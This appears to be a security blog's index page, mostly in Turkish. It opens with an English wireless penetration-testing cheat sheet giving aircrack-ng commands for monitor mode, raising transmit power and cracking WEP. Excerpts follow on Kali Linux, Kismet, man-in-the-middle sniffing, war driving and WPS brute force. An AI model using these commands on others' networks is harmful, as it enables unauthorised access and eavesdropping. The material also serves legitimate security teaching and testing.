Network Security

Wireless Penetration Testing Cheat Sheet

Posted on Updated on


WIRELESS ANTENNA


Kill Monitor Processes

root@uceka:~# airmon-ng check kill

Open the Monitor Mode

root@uceka:~# ifconfig wlan0 down
root@uceka:~# airmon-ng start wlan0
# if you get an error with airmon-ng command, try this ;
# iwconfig wlan0 mode monitor
root@uceka:~# ifconfig wlan0 up

Increase Wi-Fi TX Power

root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig

Change WiFi Channel

root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>

WEP CRACKING


 Method 1 : Fake Authentication Attack

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 2 : ARP Replay Attack

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Read the rest of this entry »

Advertisements

Backtrack 6 Çıktı!

Posted on Updated on

BackTrack Linux’un ilk versiyonu 7 yıl önce yayınlanmıştı… Günümüzde dünyada en yaygın kullanılan Linux dağıtımlarından birisi haline gelen BackTrack; pentest ve güvenlik alanında çalışmalar yapan kişiler için vazgeçilmez bir araç.
BackTrack’ın geliştiricileri yaklaşık olarak bir yıl kadar önce BackTrack 6 hakkında beyin fırtınası yapmaya başlamışlar. En sonunda Kali Linux adında çıkardıkları bu dağıtım, pek çok yenilik barındırmakta… Debian temelli bir dağıtım olan Kali Linux ile Backtrack arasında ne gibi farklar var derseniz eğer; geliştiriciler bu karşılaştırmayı yaparken “çok şey” ve “hiçbir şey” diye ifade ediyorlar. Aslında sizin BackTrack’ı hangi amaçlarda kullandığınız ile ilgili olarak aradaki farklar da değişiyor. Bu dağıtımın en büyük yeniliklerinden birisi de; cep telefonları, tablet ve bazı bilgisayar vb. kullanılan ARM işlemci destekleyen cihazlarda içinde  kullanılabilmesi.
Tamamen ücretsiz olan bu dağıtım 300’den fazla pentest aracı içermekte.Örnek ekran görüntüleri;
Read the rest of this entry »

Android ile Paket Yakalama & Online Analiz

Posted on Updated on

Wireless sniffing konusunda kullanılan en yaygın araçlardan birisi de ‘Kısmet‘tir. Bu tool aracılığı ile bağlı olunan kablosuz ağ üzerinde ki  paket akışları gözlemlenebilir. Kısmet tool’unu yazan arkadaşlar bu olayı biraz daha mobilize ederek bu aracın android versiyonunu da çıkarmışlar. Programa buradan erişebilirsiniz. Programın kullanışına gelirsek;
Read the rest of this entry »

Wireless Network Traffic Capture (Man in the Middle Attack)

Posted on Updated on

Bu yazıda çevrenizde bulunan herhangi bir kablosuz ağ trafiğini üstünüze alarak ağdan geçen bilgileri nasıl dinlenebileceğini anlatmaya çalışacağım. Öncelikle işin mantık kısmını konuşalım… Kablosuz ağını dinlemek istediğimiz kişinin veya kişilerin ağını dinleyebilmek için onlarla aynı ağı paylaşıyor olmamız lazım. Onlarla aynı ağda iseniz zaten bir problem yok… Onlarla aynı ağda değilseniz ve karşı modemin de şifresini bilmiyorsanız yazının bundan sonraki kısmı ilginizi çekebilir… Read the rest of this entry »

Kablosuz Ağların Konumunu Belirleme (War Driving)

Posted on Updated on

Wireless ağlara saldırı yapmadan önce keşif yapmak saldırınızın daha sağlıklı sonuçlanmasını sağlayacaktır. Bu anlamda Google Play‘de sunulan G-Mon uygulaması işinizi görecektir. Bu uygulama; çevrenizde bulunan kablosuz ağların konumunu ,bulunduğunuz konumun koordinat bilgileri ile eşleştirerek wireless modemlerin yerini tespit etmekte. War-Driving adı verilen bu yöntemle çevrenizde bulunan kablosuz modem haritasını çıkarmak mümkün. Seattle eyaletinin örnek wireless haritası ;
Read the rest of this entry »

WPS ile Wireless Hack (WPA-WPA2)

Posted on Updated on

WPS(Wi-Fi Protected Setup) son dönemlerde sıkça kullanılmaya başlayan, modemlere getirilen ek bir özellik. Yeni nesil modemlerin bazılarının üzerinde WPS tuşu ile wireless modeminize bağlanmak mümkün. Fakat WPS’in güvenliği için sekiz haneli bir pin kullanılıyor. Bu da ister istemez güvenlikçilerin iştahını kabartmış.Tactical Network Solutions diye bir ekip/firma Reaver adında bir linux paketi yayınlayarak ; modem şifresini WPS-Pin kod numarasını brute-force ederek çok daha kısa zamanda kırmayı başarmışlar. Daha fazla teknik detay için şuradaki dökümandan faydalanabilirsiniz.

Bu program WPA-WPA2 şifresi denemeden direk WPS pini ile giriş yapıyor. WPS şuan pek yaygın olmadığı için WPS’i desteklemeyen modemler için eski yollardan devam etmek zorunda kalınabilir… Örnek saldırımızı Backtrack üzerinde yapacağız,malzeme listesi önceki yazılarda bulunabilir… Sırayla ilerleyelim ;
Read the rest of this entry »